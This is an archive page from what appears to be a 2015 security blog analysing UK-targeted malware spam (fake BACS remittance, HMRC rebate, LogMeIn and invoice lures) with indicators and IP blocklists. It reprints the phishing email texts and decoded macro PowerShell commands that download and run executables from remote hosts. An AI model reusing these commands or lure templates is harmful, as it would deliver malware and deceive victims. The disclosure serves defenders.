Sponsored by..

Showing posts with label Webazilla. Show all posts
Showing posts with label Webazilla. Show all posts

Wednesday, 11 March 2015

Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator


Attachment: LSDB.xls

----------

From:    Vaughn Baker
Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant

----------

From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts, for the record they are:

193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177



Thursday, 26 February 2015

Malware spam: "Chris Christou [chris.christou@greysimmonds.co.uk]" / "Copy invoices"

This fake invoice spam comes with a malicious attachment:

From:    Chris Christou [chris.christou@greysimmonds.co.uk]
Date:    26 February 2015 at 10:45
Subject:    Copy invoices

Hello ,

Please find copy invoices attached as per our telephone conversation.

Kind regards,

Chris

Chris Christou
Credit Control
Grey Simmonds
Cranes Point
Gardiners Lane South
Basildon
Essex SS14 3AP
Tel:  0845 130 9070
Fax: 0845 370 9071
Email:  chris.christou@greysimmonds.co.uk
Web: www.greysimmonds.com

P  “Think before you Print” - Please consider the environment before printing this e-mail

It does NOT come from Grey Simmons, nor have their systems been compromised in any way. Instead, this is a simple forgery.

I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57] which contains this malicious macro [pastebin] which downloads a further component from:

http://xomma.net/js/bin.exe

This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56. Automated analysis tools [1] [2] show it attempting to phone home to the following IPs:

92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)

This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57] and 1997b0031ad702c8347267db0ae65539 [VT 4/57].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119

Wednesday, 25 February 2015

Malware spam: "Your LogMeIn Pro payment has been processed!"

This fake financial email does not come from LogMeIn, instead it has a malicious attachment:

From:    LogMeIn.com [no_reply@logmein.com]
Date:    25 February 2015 at 08:52
Subject:    Your LogMeIn Pro payment has been processed!

Dear client,

Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.

Date : 25/2/2015
Amount : $999 ( you saved $749.75)



The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.


Thank you for choosing LogMeIn!
Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:

http://junidesign.de/js/bin.exe

This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] show this calling home to the following IPs:

92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
I outlined some of the problems with MVTW in this post. The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57] and a malicious DLL which is probably a Dridex component [VT 4/57].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104

UPDATE:  a different version of the attachment [VT] uses this macro to download from:

http://jacekhondel.w.interia.pl/js/bin.exe

The payload is identical to the other variant.

Tuesday, 24 February 2015

Malware spam: "Berendsen UK Ltd Invoice 60020918 117" / "donotreply@berendsen.co.uk"

This fake invoice is not from Berendsen UK Ltd but is a simple forgery. They are not sending out the spam and their systems have not been compromised in any way. Instead, this email has a malicious Word document attached.

From:    donotreply@berendsen.co.uk
Date:    24 February 2015 at 08:09
Subject:    Berendsen UK Ltd Invoice 60020918 117

Dear Sir/Madam,

Please find attached your invoice dated 21st February.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.


Thank you.

___________________________________________________________
This e-mail and any attachments it may contain is confidential and
intended for the use of the named addressee(s) only. If you are not
the intended recipient, you have received it in error, please
immediately contact the sender and delete the material from your
computer system. You must not copy, print, use or disclose its
contents to any person. All e-mails are monitored for traffic data and
the content for security purposes.

Berendsen UK Ltd, part of the Berendsen plc Group.
Registered Office: 4 Grosvenor Place, London, SW1X 7DL.
Registered in England No. 228604
I have only seen one sample of this email, with a Word document IRN001549_60020918_I_01_01.doc which has a zero detection rate. Contained within this is malicious Word macro which downloads a component from the following location:

http://heikehall.de/js/bin.exe

This binary has a VirusTotal detection rate of 2/57. Automated analysis tools [1] [2] [3] show that it attempts to phone home to:

92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)


MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites, however the bad sites are concentrated in the following ranges:

92.63.82.0/23
92.63.84.0/22
92.63.88.0/24

In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156

Monday, 16 February 2015

Malware spam: "T.A.G. (The Automotive Group) Ltd." / "Lawrence Fisher [l.fisher@taghire.co.uk]" / invoice

This fake invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a forgery with a malicous attachment. Note that the taghire.co.uk simply shows "Under Construction".
From:    Lawrence Fisher [l.fisher@taghire.co.uk]
Date:    16 February 2015 at 08:25
Subject:    invoice

Here is the invoice

Kind Regards,

Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield

Tel: 020 3750 0638

Description: 150px Crop Background Remove Logo

This e-mail is confidential and may be privileged.  It may be read, copied and used only by the intended recipient. If you have received it in error, please contact the sender immediately by return e-mail or by telephoning 020 3750 0638
So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal. It contains an obfuscated Word macro which downloads an additional component from:

http://laikah.de/js/bin.exe

Usually there are two or three versions of this document, but I have only seen one. If  you look at the macro code itself, the download location is not encrypted in the code although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid anaylsus,

This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57.  Automated reporting tools [1] [2] [3] show that this POSTS to 37.139.47.105. It appears that communication is attempted with the following IPs:

37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)


Also, according to the Malwr report, a DLL is dropped with a detection rate of 3/57.

Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70